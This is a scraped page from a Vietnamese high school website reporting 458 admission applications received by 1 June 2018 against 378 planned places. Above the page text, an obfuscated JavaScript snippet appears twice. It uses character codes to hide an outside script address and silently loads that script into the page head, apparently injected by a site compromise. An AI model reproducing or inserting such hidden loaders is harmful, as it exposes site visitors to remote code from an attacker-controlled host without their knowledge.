var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Số lượng hồ sơ đăng kí vào trường Yên định 2 tính đến 17 giờ ngày 1/6/2018 là 458 hồ sơ – Trường THPT Yên Định 2 – Thanh Hóa
Danh sách cán bộ giáo viên làm nhiệm vụ thi
Danh sách cán bộ giáo viên làm nhiệm vụ chấm thi và làm phách kì thi vào 10 THPT
01/06/2018
tbt2
LỊCH TẬP TRUNG HỌC SINH KHỐI 10 NĂM HỌC 2018-2019
31/07/2018
Hiện tất cả
số lượng hồ sơ nạp vào trường yên định 2 năm 2018

số lượng hồ sơ nạp vào trường yên định 2 năm 2018

Số lượng hồ sơ nộp vào trường THPT Yên Định 2 Tính đến 17h ngày 1/6 năm 2018Số lượng học sinh, tuyển sinh dự kiến
458 hồ sơ378

 

 

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *